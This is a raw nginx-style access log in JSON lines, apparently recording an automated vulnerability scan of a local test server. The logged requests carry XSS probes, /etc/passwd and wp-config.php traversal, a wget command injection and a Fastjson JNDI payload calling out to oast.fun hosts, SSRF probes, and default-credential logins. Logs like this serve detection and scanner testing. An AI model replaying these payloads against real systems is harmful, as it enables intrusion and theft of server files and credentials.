"http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq/queues/%22onmouseover=%22alert%28nuclei%29%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ca2u0eosmpv1jhs80ca01hqmiciwc6xg3.oast.fun:80/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"logtype=XML&timezone=1%3Bwget+http%3A%2F%2Fca2u0eosmpv1jhs80ca0petzue4x91qke.oast.fun%3B","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22Lcom.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca2u0eosmpv1jhs80ca0m18g81ja8up5w.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"{\x0D\x0A \x22user_login\x22:\x2229N5m8LGllL5zu3xcSwvpX8e06A\x22,\x0D\x0A \x22password\x22:\x2229N5m8LGllL5zu3xcSwvpX8e06A\x22,\x0D\x0A \x22user_name\x22:\x2229N5m8LGllL5zu3xcSwvpX8e06A\x22,\x0D\x0A \x22user_email\x22:\x2229N5m8LGllL5zu3xcSwvpX8e06A@example.com\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-json/buddypress/v1/signup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rootDesc.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /guest_auth/guestIsUp.php","status":"400","body_bytes_sents":"154","req_time":"0.572","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test/snapshot-backdata\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"cmd=login&user=admin&passwd=21232f297a57a5a743894a0e4a801fc3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph_realtime.php?action=init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/external/7.0/system.System.get_infos HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /general/status.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/products HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seo/seopanel/login.php?sec=forgot HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/dump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"username=airflow&password=airflow&_csrf_token={{csrf_token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lan.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslmgr HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /check_mk/login.py HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-ajax-chat/sac-export.csv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /maint/index.php?packages HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) 